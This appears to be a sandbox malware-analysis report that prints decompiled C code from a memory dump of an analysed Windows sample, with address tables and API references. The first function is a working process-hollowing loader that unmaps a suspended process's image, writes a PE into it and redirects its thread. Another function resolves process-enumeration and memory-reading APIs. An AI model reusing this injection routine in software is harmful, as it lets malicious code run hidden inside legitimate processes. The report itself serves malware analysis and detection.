								if(GetThreadContext(_v48.hThread, _v16) != 0) {
									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
									if( *(_t194 + 0x34) != _v24) {
										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
									} else {
										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
										} else {
											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
										}
									}
									_t210 = _v28;
									if(_v28 != 0) {
										_t197 = E00417EA4(_t196, _t210);
										_t125 = _v28;
										if( *(_t194 + 0x34) != _v28) {
											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
											 *(_t194 + 0x34) = _v28;
											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
										}
										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
										SetThreadContext(_v48.hThread, _v16);
										ResumeThread(_v48.hThread);
										WaitForSingleObject(_v48.hThread, 0xffffffff);
										_push(_t199);
										_push(0x4181d0);
										_push( *[fs:eax]);
										 *[fs:eax] = _t201;
										TerminateThread(_v48.hProcess, 0);
										CloseHandle(_v48.hProcess);
										_pop(_t189);
										 *[fs:eax] = _t189;
									}
								}
								VirtualFree(_v20, 0, 0x8000);
							}
							if( *_a4 == 0) {
								TerminateProcess(_v48, 0);
							}
						}
					}
				}
				_pop(_t182);
				 *[fs:eax] = _t182;
				_push(E0041821F);
				return E00403EAC( &_v12, 2);
			}























    0x00417f5c
    0x00417f5d
    0x00417f5f
    0x00417f65
    0x00417f67
    0x00417f6a
    0x00417f70
    0x00417f78
    0x00417f7f
    0x00417f80
    0x00417f85
    0x00417f88
    0x00417f8f
    0x00417f91
    0x00417f96
    0x00417f99
    0x00417f9e
    0x00417fa9
    0x00417fa9
    0x00417fb3
    0x00417fb5
    0x00417fbc
    0x00417fc5
    0x00417fcd
    0x00417fdd
    0x00417fec
    0x00417ff1
    0x00417ff8
    0x00417fff
    0x0041801c
    0x00418032
    0x0041803e
    0x00418048
    0x0041804f
    0x00418058
    0x0041806d
    0x0041808e
    0x00418099
    0x004180fc
    0x0041809b
    0x004180aa
    0x004180df
    0x004180ac
    0x004180c4
    0x004180c4
    0x004180aa
    0x004180ff
    0x00418103
    0x00418110
    0x00418115
    0x0041811a
    0x00418122
    0x0041812a
    0x00418139
    0x00418139
    0x0041814f
    0x0041816f
    0x0041817d
    0x0041818b
    0x00418194
    0x0041819f
    0x004181a6
    0x004181a7
    0x004181ac
    0x004181af
    0x004181b8
    0x004181c1
    0x004181c8
    0x004181cb
    0x004181cb
    0x00418103
    0x004181e5
    0x004181e5
    0x004181f0
    0x004181f8
    0x004181f8
    0x004181f0
    0x00418032
    0x00417fcd
    0x004181ff
    0x00418202
    0x00418205
    0x00418217

    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00404E08, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00404DF4(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00404DF4(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401248();
									while( *_t93 != 0) {
										_t90 = E00404DF4(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401248();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401250();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401248();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401250();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401248();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401248();
						}
					}
				}
				L17:
				return _v16;
			}



















    0x00404e14
    0x00404e17
    0x00404e1d
    0x00404e2a
    0x00404e2e
    0x00404e70
    0x00404e76
    0x00404eb3
    0x00000000
    0x00404e78
    0x00404e7f
    0x00404e90
    0x00404e95
    0x00404e9b
    0x00404ea3
    0x00404ea8
    0x00404eb6
    0x00404eb8
    0x00404ebe
    0x00404ec2
    0x00404ec9
    0x00404eca
    0x00404f75
    0x00404edc
    0x00404ee0
    0x00404eed
    0x00404ef4
    0x00404ef5
    0x00404efe
    0x00404eff
    0x00404f17
    0x00404f1c
    0x00404f1f
    0x00404f24
    0x00404f2a
    0x00404f2b
    0x00404f3b
    0x00404f3d
    0x00404f4d
    0x00404f54
    0x00404f5e
    0x00404f5f
    0x00404f64
    0x00404f6a
    0x00404f6b
    0x00404f71
    0x00404f73
    0x00000000
    0x00404f73
    0x00404f3b
    0x00404f1c
    0x00000000
    0x00404eed
    0x00404f81
    0x00404f88
    0x00404f8c
    0x00404f8d
    0x00404f8d
    0x00404ea8
    0x00404e95
    0x00404e7f
    0x00404e30
    0x00404e3b
    0x00404e3f
    0x00000000
    0x00404e41
    0x00404e41
    0x00404e4c
    0x00404e50
    0x00404e55
    0x00000000
    0x00404e57
    0x00404e5a
    0x00404e61
    0x00404e65
    0x00404e66
    0x00404e66
    0x00404e55
    0x00404e3f
    0x00404f92
    0x00404f9b

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040B2B4, Relevance: 3.0, APIs: 2, Instructions: 37
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40b318);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E004040F8( &_v16, 7,  &_v11);
				_push(_v16);
				E00407174(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040B31F);
				return E00403E88( &_v16);
			}








    0x0040b2b4
    0x0040b2bd
    0x0040b2c2
    0x0040b2c3
    0x0040b2c8
    0x0040b2cb
    0x0040b2da
    0x0040b2ea
    0x0040b2f2
    0x0040b2fb
    0x0040b304
    0x0040b307
    0x0040b30a
    0x0040b317

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040587A, Relevance: 1.5, APIs: 1, Instructions: 38
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040587C, Relevance: 1.5, APIs: 1, Instructions: 37
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00409DB0, Relevance: 1.5, APIs: 1, Instructions: 29
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E00403EDC(_t10, _t18);
				}
				return E00403F78(_t10, _t5 - 1,  &_v260);
			}






    0x00409dbb
    0x00409dbd
    0x00409dd5
    0x00000000
    0x00409ded
    0x00000000

    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00409DFC, Relevance: 1.5, APIs: 1, Instructions: 23
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






    0x00409dff
    0x00409e00
    0x00409e16
    0x00409e1d
    0x00409e18
    0x00409e18
    0x00409e18
    0x00409e23

    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00417A70, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
    C-Code - Quality: 100%
    			E00417A70() {

				if( *0x454a18 == 0) {
					 *0x454a18 = GetModuleHandleA("kernel32.dll");
					if( *0x454a18 != 0) {
						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
					}
				}
				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
					return 0;
				} else {
					return 1;
				}
			}



    0x00417a79
    0x00417a89
    0x00417a8e
    0x00417aa1
    0x00417ab3
    0x00417ac5
    0x00417ad7
    0x00417ae9
    0x00417afb
    0x00417b0d
    0x00417b1f
    0x00417b31
    0x00417b43
    0x00417b55
    0x00417b67
    0x00417b79
    0x00417b8b
    0x00417b9d
    0x00417baf
    0x00417baf
    0x00417a8e
    0x00417bb7
    0x00417bc5
    0x00417bc6
    0x00417bc9
    0x00417bc9

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040CA40, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
    C-Code - Quality: 100%
    			E0040CA40() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
				 *0x4547f4 = _t46;
				return _t46;
			}






    0x0040ca4e
    0x0040ca62
    0x0040ca78
    0x0040ca8e
    0x0040caa4
    0x0040caba
    0x0040cad0
    0x0040cae6
    0x0040cafc
    0x0040cb12
    0x0040cb28
    0x0040cb3e
    0x0040cb54
    0x0040cb6a
    0x0040cb80
    0x0040cb96
    0x0040cbac
    0x0040cbc2
    0x0040cbd8
    0x0040cbee
    0x0040cc04
    0x0040cc1a
    0x0040cc2a
    0x0040cc30
    0x0040cc37

    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00402858, Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00404478(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















    0x0040285c
    0x0040285e
    0x0040286a
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x00402874
    0x00402877
    0x00402884
    0x00402886
    0x004028cd
    0x004028cd
    0x004028d1
    0x00000000
    0x00000000
    0x0040288c
    0x004028c0
    0x004028c9
    0x004028cb
    0x00000000
    0x004028cb
    0x00402894
    0x004028a6
    0x004028a6
    0x004028aa
    0x00000000
    0x00000000
    0x00402899
    0x004028a2
    0x004028a4
    0x004028a4
    0x004028b3
    0x004028bb
    0x004028bb
    0x004028b3
    0x004028d7
    0x004028dc
    0x004028de
    0x004028e0
    0x00402935
    0x00402935
    0x00402939
    0x00000000
    0x00000000
    0x004028e6
    0x00402921
    0x00402928
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040292a
    0x0040292a
    0x0040292c
    0x0040292f
    0x00402930
    0x00402931
    0x00000000
    0x0040292a
    0x004028ee
    0x00402907
    0x00402907
    0x0040290b
    0x00000000
    0x00000000
    0x004028f3
    0x004028fa
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004028fc
    0x004028fc
    0x004028fe
    0x00402901
    0x00402902
    0x00402903
    0x004028fc
    0x00402914
    0x0040291c
    0x0040291c
    0x00402914
    0x00402941
    0x0040287f
    0x0040287f
    0x00000000
    0x0040287f
    0x00402877

    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
